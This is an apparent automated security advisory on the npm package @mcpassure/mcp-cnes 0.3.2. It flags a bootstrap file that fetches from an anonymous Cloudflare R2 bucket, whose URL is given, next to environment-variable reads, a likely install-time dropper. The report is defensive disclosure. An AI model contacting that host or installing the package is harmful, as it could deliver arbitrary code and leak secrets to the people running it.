@mcpassure/mcp-cnes @0.3.2

Summary

dist/bootstrap.js performs a fetch against https://pub-046c52795b9445cd9f5cc5cb21b9d59f.r2.dev, an anonymous Cloudflare R2 bucket with no publisher attribution. The bucket host pattern (pub-<random-hex>.r2.dev) matches infrastructure used in prior payload-distribution incidents: bytes hosted there are mutable and not version-pinned, the publisher cannot be verified from the URL, and the package's stated MCP/CNES purpose (an MCP server for the Brazilian health-data API apidadosabertos.saude.gov.br) does not require fetching content from a third-party anonymous storage bucket. The file also references process.env at lines 11 and 14, indicating environment data is read in proximity to the remote fetch. dist/api/dadosabertos.js separately makes legitimate https.get calls to the documented apidadosabertos.saude.gov.br endpoint, which is consistent with the package's stated purpose, but the bootstrap.js R2 fetch is not. The combination of an anonymous mutable R2 bucket plus environment variable access in a bootstrap module is the canonical install/load-time dropper shape and gives the publisher the ability to ship arbitrary bytes to installers at any time.

Source: amazon-inspector (243d5ff1424c2d147ee05781c1889b007eb30e22a190bf6dc3973b676ea697a7)